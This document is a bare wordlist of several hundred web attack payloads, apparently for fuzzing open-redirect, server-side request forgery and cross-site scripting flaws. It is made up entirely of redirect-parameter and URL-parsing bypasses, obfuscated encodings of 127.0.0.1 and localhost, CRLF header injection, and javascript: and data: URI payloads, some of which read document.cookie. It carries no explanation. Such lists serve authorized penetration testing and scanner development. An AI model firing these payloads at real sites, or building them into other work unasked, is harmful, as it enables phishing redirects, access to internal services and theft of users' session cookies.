/〱google.com
〱google.com
/〵google.com
〵google.com
/ゝgoogle.com
ゝgoogle.com
/ーgoogle.com
ーgoogle.com
/ｰgoogle.com
ｰgoogle.com
$2f%2f127.0.0.1%2f%2f
$2f%2f3627734734%2f%2f
$2f%2fgoogle.com
$2f%2fgoogle.com%2f%2f
%00http://www.google.com.com
%01http://www.google.com.com
%02http://www.google.com.com
%03http://www.google.com.com
%04http://www.google.com.com
%05http://www.google.com.com
%06http://www.google.com.com
%07http://www.google.com.com
0:80
%08http://www.google.com.com
/%09/google.com
//%09/google.com
///%09/google.com
////%09/google.com
%09http%09://www.google.com.com
%09http://www.google.com.com
%09Jav%09ascript:alert(document.domain)
/%09/javascript:alert(1)
/%09/javascript:alert(1);
\%09\www.google.com.com
/%09/www.google.com@google.com
//%09/www.google.com@google.com
///%09/www.google.com@google.com
////%09/www.google.com@google.com
%0Ahttp%0A://www.google.com.com
%0Ahttp://www.google.com.com
\%0A\www.google.com.com
%0Bhttp://www.google.com.com
%0Chttp://www.google.com.com
&%0d%0a1Location:https://google.com
%0D%0A//www.google.com.com
%0D%0A\\www.google.com.com
%0Dhttp%0D://www.google.com.com
%0Dhttp://www.google.com.com
%0Ehttp://www.google.com.com
%0Fhttp://www.google.com.com
0://www.google.com.com:80;http://www.google.com:80/
%10http://www.google.com.com
%11http://www.google.com.com
////127.0.0.1
///127.0.0.1
//127.0.0.1
/\127.0.0.1
/127.0.0.1
127.0.0.1
127.0.0.1.nip.io
127-0-0-1.nip.io
%12http://www.google.com.com
%13http://www.google.com.com
%14http://www.google.com.com
\152\141\166\141\163\143\162\151\160\164\072alert(1)
%15http://www.google.com.com
%16http://www.google.com.com
%17http://www.google.com.com
%18http://www.google.com.com
%19http://www.google.com.com
%19Jav%09asc%09ript:https%20://www.google.com/%250Aconfirm%25281%2529
%1Ahttp://www.google.com.com
%1Bhttp://www.google.com.com
%1Chttp://www.google.com.com
%1Dhttp://www.google.com.com
%1Ehttp://www.google.com.com
%1Fhttp://www.google.com.com
%20http://www.google.com.com
%2f$2f127.0.0.1
%2f$2f3627734734
%2f$2fgoogle.com
%2f127.0.0.1
%2f127.0.0.1//
%2f127.0.0.1%2f%2f
/%2f%2fgoogle.com
//%2f%2fgoogle.com
%2f3627734734
%2f3627734734//
%2f3627734734%2f%2f
/%2f%5c%2f%67%6f%6f%67%6c%65%2e%63%6f%6d/
/%2f%5c%2f%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77/
%2fgoogle.com
%2fgoogle.com//
%2fgoogle.com%2f%2f
////3627734734
///3627734734
//3627734734
/\3627734734
/3627734734
3627734734
%40www.google.com.com
/%5cgoogle.com
//%5cgoogle.com
///%5cgoogle.com
////%5cgoogle.com
/%5cjavascript:alert(1)
/%5cjavascript:alert(1);
//%5cjavascript:alert(1)
//%5cjavascript:alert(1);
/%5cwww.google.com@google.com
//%5cwww.google.com@google.com
///%5cwww.google.com@google.com
////%5cwww.google.com@google.com
%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
/%68%74%74%70%3a%2f%2f%67%6f%6f%67%6c%65%2e%63%6f%6d
%68%74%74%70%73%3a%2f%2f%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77
action=https://www.google.com
action_url=https://www.google.com
";alert(0);//
allinurl:https://www.google.com
backurl=https://www.google.com
/&bsol;/www.google.com.com
burl=https://www.google.com
callback_url=https://www.google.com
/cgi-bin/redirect.cgi?https://www.google.com
?checkout_url=https://www.google.com
click?u=https://www.google.com
clickurl=https://www.google.com
?continue=https://www.google.com
data=https://www.google.com
data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=
data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+Cg==
data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=
data:www.google.com;text/html;charset=UTF-8,<html><script>document.write(document.domain);</script><iframe/src=xxxxx>aaaa</iframe></html>
?dest=https://www.google.com
?destination=https://www.google.com
desturl=https://www.google.com
ext=https://www.google.com
forward=https://www.google.com
forward_url=https://www.google.com
?go=https://www.google.com
//google%00.com
/\google%252ecom
google%252ecom
../google.com
.google.com
/.google.com
/////google.com
/////google.com/
////\;@google.com
////google.com
////google.com/
////google.com//
///;@google.com
///\;@google.com
///google.com
///google.com/
///google.com//
//;@google.com
//\/google.com/
//\google.com
//google.com
//google.com/
//google.com//
/<>//google.com
/\/\/google.com/
/\/google.com
/\/google.com/
/\google.com
/google.com
<>//google.com
@google.com
\/\/google.com/
\\google.com
google.com
google.com%23@www.google.com
////google.com/%2e%2e
///google.com/%2e%2e
//google.com/%2e%2e
/google.com/%2e%2e
//google.com/%2E%2E
////google.com/%2e%2e%2f
///google.com/%2e%2e%2f
//google.com/%2e%2e%2f
////google.com/%2f..
///google.com/%2f..
//google.com/%2f..
//google.com/%2F..
/google.com/%2F..
////google.com/%2f%2e%2e
///google.com/%2f%2e%2e
//google.com/%2f%2e%2e
/google.com/%2f%2e%2e
//google.com//%2F%2E%2E
//google.com:80#@www.google.com/
//google.com:80?@www.google.com/
google.com/.jpg
//google.com\twww.google.com/
//google.com/www.google.com
//google.com\@www.google.com
google.com/www.google.com
//google%E3%80%82com
goto=https://www.google.com
h%09ttp://www.google.com.com
h%0Attp://www.google.com.com
h%0Dttp://www.google.com.com
http://00330.00072.0000326.00000316
http:00330.00072.0000326.00000316
http://00330.0x3a.54990
http:00330.0x3a.54990
http://00330.3856078
http:00330.3856078
http://0330.072.0326.0316
http:0330.072.0326.0316
http%09://www.google.com.com
http:%0a%0dgoogle.com
http%0A://www.google.com.com
http%0D://www.google.com.com
http:/0/www.google.com.com
http://0xd8.072.54990
http:0xd8.072.54990
http://0xd8.0x3a.0xd6.0xce
http:0xd8.0x3a.0xd6.0xce
http://0xd8.3856078
http:0xd8.3856078
http://0xd83ad6ce
http:0xd83ad6ce
http://[::127.0.0.1]
http://127.0.0.1
http:[::127.0.0.1]
http:127.0.0.1
http://3627734734
http:3627734734
http://3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
http:3H6k7lIAiqjfNeN@00330.00072.0000326.00000316
http://3H6k7lIAiqjfNeN@00330.0x3a.54990
http:3H6k7lIAiqjfNeN@00330.0x3a.54990
http://3H6k7lIAiqjfNeN@00330.3856078
http:3H6k7lIAiqjfNeN@00330.3856078
http://3H6k7lIAiqjfNeN@0330.072.0326.0316
http:3H6k7lIAiqjfNeN@0330.072.0326.0316
http://3H6k7lIAiqjfNeN@0xd8.072.54990
http:3H6k7lIAiqjfNeN@0xd8.072.54990
http://3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
http:3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce
http://3H6k7lIAiqjfNeN@0xd8.3856078
http:3H6k7lIAiqjfNeN@0xd8.3856078
http://3H6k7lIAiqjfNeN@0xd83ad6ce
http:3H6k7lIAiqjfNeN@0xd83ad6ce
http://3H6k7lIAiqjfNeN@[::127.0.0.1]
http://3H6k7lIAiqjfNeN@127.0.0.1
http:3H6k7lIAiqjfNeN@[::127.0.0.1]
http:3H6k7lIAiqjfNeN@127.0.0.1
http://3H6k7lIAiqjfNeN@3627734734
http:3H6k7lIAiqjfNeN@3627734734
http://3H6k7lIAiqjfNeN@[::ffff:127.0.0.1]
http:3H6k7lIAiqjfNeN@[::ffff:127.0.0.1]
http://3H6k7lIAiqjfNeN@www.google.com+@google.com/
http://3H6k7lIAiqjfNeN@www.google.com@google.com/
http:%40www.google.com.com
http://%67%6f%6f%67%6c%65%2e%63%6f%6d
http://anythingwww.google.com/
http://[::ffff:127.0.0.1]
http:[::ffff:127.0.0.1]
/http://google.com
/http:/google.com
http://.google.com
http:///////////google.com
http://;@google.com
http://google.com
http:/\/\google.com
http:/google.com
http:google.com
http://google.com%23.www.google.com/
http://google.com%2f%2f.www.google.com/
http://google.com%3F.www.google.com/
http://google.com%5c%5c.www.google.com/
http://google.com:80#@www.google.com/
http://google.com:80?@www.google.com/
http://google.com\twww.google.com/
http://google.com&www.google.com
http://google.com\www.google.com
http://localhost.www.google.com.com/
https://0/
https://0.0.0.0/
https://0000.0000.0000.0000/
https://00000177.00000000.00000000.00000001/
https://0177.0000.0000.0001/
https://017700000001/
https://%09/google.com
https://%09www.google.com.com/
https://%09/www.google.com@google.com
https://%0Awww.google.com.com/
https://0%E2%91%B0700000001/
https://0x00000000/
https://0x100000000/
https://0x17f000001/
https://0x17f000002/
https://0x7F.0.0000.00000001/
https://0x7F.0.0000.0001/
https://0x7f000001/
https://0x7f000002/
https://0x7f.0x00.0x00.0x01/
https://0x7f.0x00.0x00.0x02/
https://0x7F.1/
https://127.000000000000000.1/
https://127.0.0.1/
https://127.0.0.2/
https://127.1/
https://1%E3%89%97.0.0.1/
https://1%E3%89%97.0.0.2/
https://2130706433/
https://21307064%E3%89%9D/
https://2130706%E3%8A%B83/
https://21%E3%89%9A706433/
https://2%E2%91%AC0706433/
https://%400/
https:%40www.google.com.com
https://45080379393/
https://%5B0000:0000:0000:0000:0000:0000:0000:0000%5D/
https://%5B0000:0000:0000:0000:0000:0000:0000:0001%5D/
https://%5B0:0:0:0:0:%EF%AC%80%EF%AC%80:127.0.0.1%5D/
https://%5B0:0:0:0:0:ffff:127.0.0.1%5D/
https://%5B0:0:0:0:0:ffff:1%E3%89%97.0.0.1%5D/
https://%5B0:0:0:0:0:ffff:%E2%91%AB7.0.0.1%5D/
https://%5B0000::1%5D/
https://%5B::1%5D/
https://%5B::%5D/
https://%5B::%EF%AC%80%EF%AC%80:7f00:1%5D/
https://%5B::ffff:0000:0000%5D/
https://%5B::ffff:0.0.0.0%5D/
https://%5B::ffff:7f00:1%5D/
/https://%5cgoogle.com
https://%5cgoogle.com
/https://%5cwww.google.com@google.com
https://%5cwww.google.com@google.com
https://%6c%6f%63%61%6c%64%6f%6d%61%69%6e%2e%70%77
https://anythingwww.google.com/
https://%C2%ADlocalhost/
https://%C2%ADwww.google.com.com/
https://%CD%8Flocalhost/
https://%E1%A0%8Blocalhost/
https://%E1%A0%8Clocalhost/
https://%E1%A0%8Dlocalhost/
https://%E1%A0%8Elocalhost/
https://%E1%A0%8Flocalhost/
https://%E2%80%8Blocalhost/
https://%E2%80%8Bwww.google.com.com/
https://%E2%81%A0localhost/
https://%E2%81%A0www.google.com.com/
https://%E2%81%A4localhost/
https://%E2%91%AB7.0.0.1/
https://%E2%91%AB7.0.0.2/
https://%E3%89%9130706433/
https://%E3%89%91%E3%89%9A%E2%91%A6%E2%93%AA%E2%91%A5%E2%91%A3%E3%89%9D/
https://foo%40www.google.com.com%20%40www.google.com/
https://foo%40www.google.com.com:443%40www.google.com/
//https://google.com//
/https://google.com
/https://google.com/
/https://google.com//
/https:google.com
https://////google.com
https://google.com
https://google.com/
https://google.com//
https:/\google.com
https:google.com
//https:///google.com/%2e%2e
/https://google.com/%2e%2e
https:///google.com/%2e%2e
//https://google.com/%2e%2e%2f
https://google.com/%2e%2e%2f
/https://google.com/%2f..
https://google.com/%2f..
/https:///google.com/%2f%2e%2e
/https://google.com/%2f%2e%2e
https:///google.com/%2f%2e%2e
https://google.com/%2f%2e%2e
https://:@google.com\@www.google.com
https://google.com#www.google.com
https://google.com/www.google.com
https://google.com?www.google.com
https://google.com\www.google.com
https://google%E3%80%82com
https://localho%EF%AC%85/
https://localho%EF%AC%86/
https://\l\o\c\a\l\h\o\s\t/
https://localhost/
https://localhost.www.google.com.com/
https://lo%E3%8E%88host/
/https://www.google.com
@https://www.google.com
http://swww.google.com/
https://www.google.com%20&%40www.google.com.com#%20%40www.google.com.com/
https://www.google.com.%21.www.google.com.com/
https://www.google.com.%24.www.google.com.com/
https://www.google.com%2523www.google.com.com/
https://www.google.com.%27.www.google.com.com/
https://www.google.com.%28.www.google.com.com/
https://www.google.com.%29.www.google.com.com/
https://www.google.com.%2C.www.google.com.com/
//https:///www.google.com/%2e%2e
/https://www.google.com/%2e%2e
https:///www.google.com/%2e%2e
//https://www.google.com/%2e%2e%2f
https://www.google.com/%2e%2e%2f
/https:///www.google.com/%2f%2e%2e
/https://www.google.com/%2f%2e%2e
https:///www.google.com/%2f%2e%2e
https://www.google.com/%2f%2e%2e
https://www.google.com%40www.google.com.com/
https://www.google.com:%40www.google.com.com/
https://www.google.com?%40www.google.com.com/
https://www.google.com\;%40www.google.com.com/
https://www.google.com:443:\%40%40www.google.com.com/
https://www.google.com:443#\%40www.google.com.com/
https://www.google.com:443\%40www.google.com.com/
https://www.google.com%5B%40www.google.com.com/
https://www.google.com.%5F.www.google.com.com/
https://www.google.com.%7E.www.google.com.com/
https://www.google.com&anything%40www.google.com.com/
https://www.google.com:anything%40www.google.com.com/
https://\\www.google.com.com/
https://www.google.com.com../
https:www.google.com.com
https://www.google.com.com%00www.google.com/
https://www.google.com.com%09www.google.com/
https://www.google.com.com%0Awww.google.com/
https://www.google.com.com%0D%0Awww.google.com/
https://www.google.com.com%0Dwww.google.com/
https://www.google.com.com%20%40www.google.com/
https://www.google.com.com%20&%40www.google.com/
https://www.google.com.com%20www.google.com/
https://www.google.com.com%250d%250a%40www.google.com/
https://www.google.com.com%2523%40www.google.com/
https://www.google.com.com%252e%40www.google.com/
https://www.google.com.com%252f%40www.google.com/
https://www.google.com.com%253a443.www.google.com/
https://www.google.com.com%25ffwww.google.com/
https://www.google.com.com%40%40www.google.com/
https://www.google.com.com:\%40%40www.google.com/
https://www.google.com.com\%40%40www.google.com/
https://www.google.com.com#%40www.google.com/
https://www.google.com.com#\%40www.google.com/
https://www.google.com.com%40www.google.com/
https://www.google.com.com+%40www.google.com/
https://www.google.com.com+&%40www.google.com/
https://www.google.com.com\anything%40www.google.com/
https://www.google.com.com/?d=www.google.com/
https://www.google.com.com%E2%80%A8www.google.com/
https://www.google.com.com%E2%80%A9www.google.com/
https://www.google.com.com%EF%B9%A0www.google.com/
https://www.google.com.com%EF%BC%86www.google.com/
https://www.google.com.com%EF%BC%8Ewww.google.com/
https://www.google.com.com;https://www.google.com/
https://www.google.com.com#www.google.com/
https://www.google.com.com.www.google.com/
https://www.google.com.com/.www.google.com/
https://www.google.com.com///www.google.com/
https://www.google.com.com/www.google.com/
https://www.google.com.com?=.www.google.com/
https://www.google.com.com?=www.google.com/
https://www.google.com.com?www.google.com/
https://www.google.com.com\.www.google.com/
https://www.google.com.com\www.google.com/
//https://www.google.com@google.com//
/https://www.google.com@google.com/
https://www.google.com.google.com
https://www.google.com;@google.com
https://www.google.com@google.com
https://www.google.com@google.com/
https://www.google.com@google.com//
/https://www.google.com@google.com/%2e%2e
https:///www.google.com@google.com/%2e%2e
//https://www.google.com@google.com/%2e%2e%2f
https://www.google.com@google.com/%2e%2e%2f
/https://www.google.com@google.com/%2f..
https://www.google.com@google.com/%2f..
/https:///www.google.com@google.com/%2f%2e%2e
/https://www.google.com@google.com/%2f%2e%2e
https:///www.google.com@google.com/%2f%2e%2e
https://www.google.com@google.com/%2f%2e%2e
/https://www.google.com@google.com/%2f.//www.google.com@google.com/%2f..
https://www.google.com/https://google.com/
https://www.google.com/https://www.google.com/
https://www.google.com.local/
https://www.google.com.localhost/
/https://www.google.com@www.google.com/%2e%2e
https:///www.google.com@www.google.com/%2e%2e
//https://www.google.com@www.google.com/%2e%2e%2f
https://www.google.com@www.google.com/%2e%2e%2f
/https:///www.google.com@www.google.com/%2f%2e%2e
/https://www.google.com@www.google.com/%2f%2e%2e
https:///www.google.com@www.google.com/%2f%2e%2e
https://www.google.com@www.google.com/%2f%2e%2e
https://www.google.com#www.google.com.com/
https://www.google.com.".www.google.com.com/
https://www.google.com.&.www.google.com.com/
https://www.google.com.*.www.google.com.com/
https://www.google.com.+.www.google.com.com/
https://www.google.com.-.www.google.com.com/
https://www.google.com.;.www.google.com.com/
https://www.google.com.=.www.google.com.com/
https://www.google.com.`.www.google.com.com/
https://www.google.com.{.www.google.com.com/
https://www.google.com.}.www.google.com.com/
https://www.google.com.www.google.com.com/
https://www.google.com;.www.google.com.com/
https://www.google.comwww.google.com.com/
http://www.google.com@00330.00072.0000326.00000316
http:www.google.com@00330.00072.0000326.00000316
http://www.google.com@00330.0x3a.54990
http:www.google.com@00330.0x3a.54990
http://www.google.com@00330.3856078
http:www.google.com@00330.3856078
http://www.google.com@0330.072.0326.0316
http:www.google.com@0330.072.0326.0316
http://www.google.com@0xd8.072.54990
http:www.google.com@0xd8.072.54990
http://www.google.com@0xd8.0x3a.0xd6.0xce
http:www.google.com@0xd8.0x3a.0xd6.0xce
http://www.google.com@0xd8.3856078
http:www.google.com@0xd8.3856078
http://www.google.com@0xd83ad6ce
http:www.google.com@0xd83ad6ce
http://www.google.com@[::127.0.0.1]
http://www.google.com@127.0.0.1
http:www.google.com@[::127.0.0.1]
http:www.google.com@127.0.0.1
http://www.google.com%2egoogle.com/
http://www.google.com@3627734734
http:www.google.com@3627734734
http:/\\www.google.com.com
http:/\www.google.com.com
http:/www.google.com.com
http:\\www.google.com.com
http:\\www.google.com.com\
http:\www.google.com.com
http:www.google.com.com
http://www.google.com.com.www.google.com/
http://www.google.com@[::ffff:127.0.0.1]
http:www.google.com@[::ffff:127.0.0.1]
http://www.google.com.google.com
http://XY>.7d8T\205pZM@00330.00072.0000326.00000316
http:XY>.7d8T\205pZM@00330.00072.0000326.00000316
http://XY>.7d8T\205pZM@00330.0x3a.54990
http:XY>.7d8T\205pZM@00330.0x3a.54990
http://XY>.7d8T\205pZM@00330.3856078
http:XY>.7d8T\205pZM@00330.3856078
http://XY>.7d8T\205pZM@0330.072.0326.0316
http:XY>.7d8T\205pZM@0330.072.0326.0316
http://XY>.7d8T\205pZM@0xd8.072.54990
http:XY>.7d8T\205pZM@0xd8.072.54990
http://XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
http:XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce
http://XY>.7d8T\205pZM@0xd8.3856078
http:XY>.7d8T\205pZM@0xd8.3856078
http://XY>.7d8T\205pZM@0xd83ad6ce
http:XY>.7d8T\205pZM@0xd83ad6ce
http://XY>.7d8T\205pZM@[::127.0.0.1]
http://XY>.7d8T\205pZM@127.0.0.1
http:XY>.7d8T\205pZM@[::127.0.0.1]
http:XY>.7d8T\205pZM@127.0.0.1
http://XY>.7d8T\205pZM@3627734734
http:XY>.7d8T\205pZM@3627734734
http://XY>.7d8T\205pZM@[::ffff:127.0.0.1]
http:XY>.7d8T\205pZM@[::ffff:127.0.0.1]
http://XY>.7d8T\205pZM@www.google.com+@google.com/
http://XY>.7d8T\205pZM@www.google.com@google.com/
?image_url=https://www.google.com
ja\nva\tscript\r:alert(1)
java%09script:alert(1)
java%0ascript:alert(1)
java%0d%0ascript%0d%0a:alert(0)
java%0dscript:alert(1)
Javas%26%2399;ript:alert(1)
javascript://%0aalert(1)
javascript://%250A1?alert(1):0
javascript://%250Aalert(1)
javascript://%250Aalert(1)//?1
javascript://%250Alert(document.location=document.cookie)
//javascript:alert(1)
//javascript:alert(1);
/javascript:alert(1)
/javascript:alert(1);
<>javascript:alert(1);
\j\av\a\s\cr\i\pt\:\a\l\ert\(1\)
javascript:alert(1)
javascript:alert(1);
javascripT://anything%0D%0A%0D%0Awindow.alert(document.cookie)
javascript:confirm(1)
javascript://https://www.google.com/?z=%0Aalert(1)
javascript:prompt(1)
jaVAscript://www.google.com//%0d%0aalert(1);//
javascript://www.google.com?%a0alert%281%29
jump=https://www.google.com
jump_url=https://www.google.com
j?url=https://www.google.com
linkAddress=https://www.google.com
link=https://www.google.com
location=https://www.google.com
login=https://www.google.com
/login?to=https://www.google.com
logout=https://www.google.com
/&NewLine;/www.google.com.com
?next=https://www.google.com
origin=https://www.google.com
originUrl=https://www.google.com
/out/https://www.google.com
/out?https://www.google.com
page=https://www.google.com
pic=https://www.google.com
q=https://www.google.com
qurl=https://www.google.com
recurl=https://www.google.com
/redirect/https://www.google.com
?redirect=https://www.google.com
Redirect=https://www.google.com
?redirect_uri=https://www.google.com
?redirect_url=https://www.google.com
RedirectUrl=https://www.google.com
?redir=https://www.google.com
request=https://www.google.com
?return=https://www.google.com
?return_path=https://www.google.com
?return_to=https://www.google.com
?returnTo=https://www.google.com
ReturnUrl=https://www.google.com
rit_url=https://www.google.com
?rurl=https://www.google.com
service=https://www.google.com
/&sol;/www.google.com.com
sp_url=https://www.google.com
src=https://www.google.com
success=https://www.google.com
/&Tab;/www.google.com.com
?target=https://www.google.com
tc?src=https://www.google.com
\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003aalert(1)
u1=https://www.google.com
u=https://www.google.com
uri=https://www.google.com
?url=https://www.google.com
url=//https://www.google.com
Url=https://www.google.com
?view=https://www.google.com
////www.google.com/%2e%2e
///www.google.com/%2e%2e
////www.google.com/%2e%2e%2f
///www.google.com/%2e%2e%2f
//www.google.com/%2e%2e%2f
////www.google.com/%2f%2e%2e
///www.google.com/%2f%2e%2e
//www.google.com/%2f%2e%2e
/\www.google.com:80%40google.com
#www.google.com.com
///www.google.com.com
//www.google.com.com
/\www.google.com.com
\/www.google.com.com
www.google.com@%E2%80%AE@google.com
////www.google.com@google.com/
////www.google.com@google.com//
///www.google.com@google.com/
///www.google.com@google.com//
//www.google.com@google.com/
//www.google.com@google.com//
www.google.com.google.com
www.google.com;@google.com
////www.google.com@google.com/%2e%2e
///www.google.com@google.com/%2e%2e
////www.google.com@google.com/%2e%2e%2f
///www.google.com@google.com/%2e%2e%2f
//www.google.com@google.com/%2e%2e%2f
////www.google.com@google.com/%2f..
///www.google.com@google.com/%2f..
//www.google.com@google.com/%2f..
////www.google.com@google.com/%2f%2e%2e
///www.google.com@google.com/%2f%2e%2e
//www.google.com@google.com/%2f%2e%2e
//www.google.com+&@google.com#+@www.google.com/
//www.google.com@https:///google.com/%2e%2e
//www.google.com@https:///www.google.com/%2e%2e
////www.google.com@www.google.com/%2e%2e
///www.google.com@www.google.com/%2e%2e
////www.google.com@www.google.com/%2e%2e%2f
///www.google.com@www.google.com/%2e%2e%2f
//www.google.com@www.google.com/%2e%2e%2f
////www.google.com@www.google.com/%2f%2e%2e
///www.google.com@www.google.com/%2f%2e%2e
//www.google.com@www.google.com/%2f%2e%2e
/x:1/:///%01javascript:alert(document.cookie)/
\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3aalert(1)
//XY>.7d8T\205pZM@www.google.com+@google.com/
//XY>.7d8T\205pZM@www.google.com@google.com/
